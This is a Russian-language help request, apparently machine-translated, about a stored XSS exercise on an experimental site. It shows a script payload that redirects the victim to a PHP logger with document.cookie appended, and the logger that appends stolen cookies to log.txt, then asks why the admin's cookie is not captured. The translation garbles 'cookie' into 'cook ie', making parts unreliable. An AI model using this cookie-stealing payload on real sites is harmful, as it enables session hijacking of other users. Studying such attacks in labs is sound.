Вот сценарий.
На сервере находится экспериментальный сайт, который позволяет мне входить с любым именем пользователя и паролем. После входа в систему он показывает мне форму, которую можно атаковать с помощью XSS. Форма содержит два поля, поле получателя и поле сообщения. Когда я отправляю форму, она отправляет сообщение на сервер, который всегда проверяет сообщение и предоставляет ответ со случайным текстом. Это не происходит автоматически после отправки формы.
- Я вхожу с именем пользователя = "user" и паролем = "123"
- Форма отправляется со следующими данными: получатель = «admin» и message = «alert (« все сработало »)«
- Я перенаправляюсь на страницу, на которой есть ссылка для чтения моего почтового ящика
- Когда я нажимаю «просмотреть мой почтовый ящик» и Затем команда оповещения выполняется.
Теперь цель состоит в том, чтобы получить администратора администратора ie, используя ответ, который он автоматически отправляет мне. Я отправляю следующую Javascript в форму:
<script>
document.location = 'http://localhost/script.php?c='+document.cookie
</script>
И у меня есть следующий php скрипт, который работает в фоновом режиме и хватает повара ie.
<?php
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
?>
Проблема в том, что я продолжаю получать своего повара ie (мои данные для входа):
username = user, password = 123
Когда администратор открывает сообщение, сценарий не выполняется. Я также попытался вставить изображение с атрибутом источника, который приводит к моему сценарию php, но это не помогло. Любая помощь будет оценена.